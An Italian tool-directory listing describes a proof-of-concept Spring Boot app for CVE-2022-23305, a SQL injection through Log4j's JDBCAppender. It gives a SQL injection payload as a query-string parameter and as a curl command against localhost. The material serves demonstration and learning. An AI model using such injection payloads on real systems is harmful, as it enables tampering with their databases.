Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-23305_POC — CVE-2022-23305 Log4J JDBCAppender SQl injection POC | Kitploit
Strumenti/GitHubGitHub/tkomlodi/cve-2022-23305_poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e FormazioneSicurezza dei DatabaseLab e Pratica
GitHubtkomlodi/cve-2022-23305_poc

CVE-2022-23305_POC

CVE-2022-23305 Log4J JDBCAppender SQl injection POC

Vedi Repository
13 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2022-23305 Log4j JDBCAppender sql injection POC

Questa è un'applicazione molto semplice basata su Spring Boot che dimostra la vulnerabilità CVE-2022-23305. Utilizza Apache Maven, Spring Boot, Spring MVC e il database in-memory H2 per registrare una semplice voce, presa come parametro della query string dell'URL. Poiché Log4J è configurato per utilizzare un JDBCAppender, è vulnerabile all'iniezione SQL.

Vedi src/main/java/poc/InjectionController.java per l'istruzione di logging.
Vedi la cartella src/main/resource per tutti i file di configurazione.

Puoi eseguire l'applicazione usando Java e Maven eseguendo "mvn clean spring-boot:run".
Puoi anche eseguirla come applicazione Docker, ad esempio:
 docker build --tag log4j-poc .
 docker run -p 8080:8080 log4j-poc

L'app sarà disponibile all'indirizzo http://localhost:8080/.
Per sfruttare la vulnerabilità, invia un'istruzione sql iniettata come parametro che viene registrato:
 "http://localhost:8080/?param=');insert into logs values(':("
Il risultato elencherà le voci di log aggiunte, inclusa quella inserita dall'sql iniettato nel parametro.
Per fare lo stesso con curl usa:
 curl 'http://localhost:8080/?param=%27);insert%20into%20logs%20values(%27:('

Scarica lo strumento